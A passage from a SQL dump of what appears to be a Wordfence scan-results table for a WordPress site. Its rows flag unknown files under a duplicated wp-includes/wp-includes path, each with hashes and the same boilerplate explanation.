More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/class-wp-xmlrpc-server.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33837,1631564682,1631564682,'new','knownfile',75,'891c8a5dd60e0ba3e9c8a5732d64b8eb','cca00a349d565ac6a8d622a85fc4798d','Unknown file in WordPress core: wp-includes/wp-includes/class-wp.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:36:\"wp-includes/wp-includes/class-wp.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33838,1631564682,1631564682,'new','knownfile',75,'9ce3599086f57775e4f19e419cdc2e39','0352f0866b3e26b348b681b382ff0d2d','Unknown file in WordPress core: wp-includes/wp-includes/class.wp-dependencies.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/class.wp-dependencies.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33839,1631564682,1631564682,'new','knownfile',75,'fb84acc51bab8c80f6171f92af798d32','53b5fdde2ccb9d6763fb1c6eafc9f076','Unknown file in WordPress core: wp-includes/wp-includes/class.wp-scripts.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/class.wp-scripts.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33840,1631564682,1631564682,'new','knownfile',75,'1cd6c0fb120038723cfbf0dbe866103a','6fdb751db29d64ff34269db971d48483','Unknown file in WordPress core: wp-includes/wp-includes/class.wp-styles.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/class.wp-styles.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33841,1631564682,1631564682,'new','knownfile',75,'ce32fe6706c75236eed6459d8bb85750','1bf3fdd2528abab313ed60df5f6beafa','Unknown file in WordPress core: wp-includes/wp-includes/comment-template.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/comment-template.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33842,1631564682,1631564682,'new','knownfile',75,'1c119c7d7a202ae29c6f3928c260d700','7e641e464e9de3098706a385465e863d','Unknown file in WordPress core: wp-includes/wp-includes/comment.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:35:\"wp-includes/wp-includes/comment.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33843,1631564682,1631564682,'new','knownfile',75,'e761ee39c6a03141aecbd20b1d98ef89','16618b570c06f6ace343eb55deb2ff2a','Unknown file in WordPress core: wp-includes/wp-includes/compat.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:34:\"wp-includes/wp-includes/compat.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33844,1631564682,1631564682,'new','knownfile',75,'4fe7110b55a836ed5ffb5e6dcce5ffeb','405f3eba08bf8129aa63d98f05d72374','Unknown file in WordPress core: wp-includes/wp-includes/cron.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:32:\"wp-includes/wp-includes/cron.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33845,1631564682,1631564682,'new','knownfile',75,'51a21370f61415c0ae3c2755bb03803d','00ed3fc970675eadf427a99a0c4fdb22','Unknown file in WordPress core: wp-includes/wp-includes/css/admin-bar-rtl.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/css/admin-bar-rtl.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33846,1631564682,1631564682,'new','knownfile',75,'70895e53d1d8dc9249c0ee1d5aacec02','1720e04b888a607225e4a5dad7cfe06b','Unknown file in WordPress core: wp-includes/wp-includes/css/admin-bar-rtl.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/css/admin-bar-rtl.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33847,1631564682,1631564682,'new','knownfile',75,'6a0d51133df33bcb9a62d9da35223af4','28f6d8366c8998ee149eea8593dc9130','Unknown file in WordPress core: wp-includes/wp-includes/css/admin-bar.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/css/admin-bar.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33848,1631564682,1631564682,'new','knownfile',75,'1d3442ac03839f952efc77bb08c7528d','63405de0472eb6630c5f5100f0cb4eb9','Unknown file in WordPress core: wp-includes/wp-includes/css/admin-bar.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/css/admin-bar.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33849,1631564682,1631564682,'new','knownfile',75,'195bece47da8f5601e156127b39df4b1','3ec439475fa4db394c1e8eff751e049b','Unknown file in WordPress core: wp-includes/wp-includes/css/buttons-rtl.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/css/buttons-rtl.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33850,1631564682,1631564682,'new','knownfile',75,'ba26fe7a58414cf93c1624b8263c74f4','1ccb26b0eb6b0e15e228810f9f33d5ae','Unknown file in WordPress core: wp-includes/wp-includes/css/buttons-rtl.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/css/buttons-rtl.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33851,1631564682,1631564682,'new','knownfile',75,'b3ccbc737e26770ec44b8468602d6d8d','a5ddb1da98d63723ecbbbc6831d94a0a','Unknown file in WordPress core: wp-includes/wp-includes/css/buttons.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:39:\"wp-includes/wp-includes/css/buttons.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33852,1631564682,1631564682,'new','knownfile',75,'39896f81d8741260f57039e45020cd6d','3614c0494170c462569e4e541461c3fa','Unknown file in WordPress core: wp-includes/wp-includes/css/buttons.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/css/buttons.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33853,1631564682,1631564682,'new','knownfile',75,'fb03681ca75151ed018505f819a2564d','e79ac9419abc3fb7dfaf3354f21c899c','Unknown file in WordPress core: wp-includes/wp-includes/css/customize-preview-rtl.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/css/customize-preview-rtl.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33854,1631564682,1631564682,'new','knownfile',75,'7dd2744e5e2c1d5a0c03ca551c0843d9','40cd72ef27b15c3a6230e484a1530105','Unknown file in WordPress core: wp-includes/wp-includes/css/customize-preview-rtl.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/css/customize-preview-rtl.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33855,1631564682,1631564682,'new','knownfile',75,'f7d25d0debc889e3f087dd2dfb32f885','41a55dc6cbbb5c3805178e34aca24bf0','Unknown file in WordPress core: wp-includes/wp-includes/css/customize-preview.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/css/customize-preview.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33856,1631564682,1631564682,'new','knownfile',75,'6619318ea9d7432f9041fca658e0c7c1','0ef3f969331d088be30f69353d9ba643','Unknown file in WordPress core: wp-includes/wp-includes/css/customize-preview.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/css/customize-preview.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33857,1631564682,1631564682,'new','knownfile',75,'62862de32af2621c5ed6d57affbb41c6','818035408368ea6b567fd9ce9a8ec87a','Unknown file in WordPress core: wp-includes/wp-includes/css/dashicons.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/css/dashicons.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33858,1631564682,1631564682,'new','knownfile',75,'a5c74d8b0bdc9cfe6bcff1e804f35246','a75fb48b5eb1c3bbf3bf04e37b845f25','Unknown file in WordPress core: wp-includes/wp-includes/css/dashicons.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/css/dashicons.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33859,1631564682,1631564682,'new','knownfile',75,'dbf615036b8c9e2020f9051375c87963','dae3f7444f2bc9e9640546f05df65132','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/block-directory/style-rtl.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:62:\"wp-includes/wp-includes/css/dist/block-directory/style-rtl.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33860,1631564682,1631564682,'new','knownfile',75,'3c06f92cce51558f2e5da443103414d4','f0ca77de528f00009bc24aeb1202fd40','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/block-directory/style-rtl.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:66:\"wp-includes/wp-includes/css/dist/block-directory/style-rtl.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33861,1631564682,1631564682,'new','knownfile',75,'430218750aa8f04753ef80cc063b0b82','53a51e19d65000663ebb532381697816','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/block-directory/style.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/css/dist/block-directory/style.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33862,1631564683,1631564683,'new','knownfile',75,'f1842805a66772a97cc72a3eb0bf110b','beb5f032f6692801f98378c38c14bb82','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/block-directory/style.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:62:\"wp-includes/wp-includes/css/dist/block-directory/style.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33863,1631564683,1631564683,'new','knownfile',75,'a84918bb72be7a31b119348b031deda5','e93cd45981d31648d3799bd755fe6fb1','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/block-editor/style-rtl.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/css/dist/block-editor/style-rtl.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33864,1631564683,1631564683,'new','knownfile',75,'6c0e732d55b7d2ceeda615759d9c64e7','5843cdb3575abea326b66b67f39ef87a','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/block-editor/style-rtl.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:63:\"wp-includes/wp-includes/css/dist/block-editor/style-rtl.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33865,1631564683,1631564683,'new','knownfile',75,'ccfd0beea85c1088bcb39c389df2f7a6','94389adcd9aa383d2a92e8861d88db84','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/block-editor/style.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/css/dist/block-editor/style.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33866,1631564683,1631564683,'new','knownfile',75,'d847dee81f035926112fa212154bf621','7dee631f940823fa10c71c2dcc3376da','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/block-editor/style.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/css/dist/block-editor/style.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33867,1631564683,1631564683,'new','knownfile',75,'ca4b6e8dafaeb712aa0a38f222275b41','f34717243782ada4a10b3a20c1bf2fb2','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/block-library/common-rtl.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/css/dist/block-library/common-rtl.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33868,1631564683,1631564683,'new','knownfile',75,'d6a57fa7384420b1cee65b3c11613555','868baf690d325a0f8f1ad322a83fe73b','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/block-library/common-rtl.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:65:\"wp-includes/wp-includes/css/dist/block-library/common-rtl.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33869,1631564683,1631564683,'new','knownfile',75,'12f1a252a34c7f2147f7abf0b47b9583','760b3ffb39abaeab158ca34336a4778d','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/block-library/common.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/css/dist/block-library/common.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33870,1631564683,1631564683,'new','knownfile',75,'43d83f21658dc22ff2a2a2cf16a702f3','03132b8b0188298d7112a9f3e9c08f5b','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/block-library/common.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/css/dist/block-library/common.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33871,1631564683,1631564683,'new','knownfile',75,'3dde8674acabcf989c6453fb8405e63b','8e59a6fdba73fb8f4136c4c8b64e350b','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/block-library/editor-rtl.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/css/dist/block-library/editor-rtl.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33872,1631564683,1631564683,'new','knownfile',75,'e4e0753b1a96881ebb00bffd10b032d2','b31e9701b4d9ee3393ea6ad64ea27fbb','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/block-library/editor-rtl.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:65:\"wp-includes/wp-includes/css/dist/block-library/editor-rtl.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33873,1631564683,1631564683,'new','knownfile',75,'659d269ba20d3de17a45729c4423fc2b','0d61aaf2dcd5a0110081c3f20e90202f','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/block-library/editor.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/css/dist/block-library/editor.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33874,1631564683,1631564683,'new','knownfile',75,'79889ff7fa3cbe21f91c68b39b5cb6b0','0a535559ef9fbf114b40200168cdfb8e','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/block-library/editor.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/css/dist/block-library/editor.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33875,1631564684,1631564684,'new','knownfile',75,'aca0e15a1fcd7309ff4d0c1b56e6a9c7','7ec45622731f3a708518ffc016364e79','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/block-library/style-rtl.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:60:\"wp-includes/wp-includes/css/dist/block-library/style-rtl.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33876,1631564684,1631564684,'new','knownfile',75,'7095aaf94b04bbe1e197a0a0a9be1262','7dad73920cfaf111bb8858cab3e84d98','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/block-library/style-rtl.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn 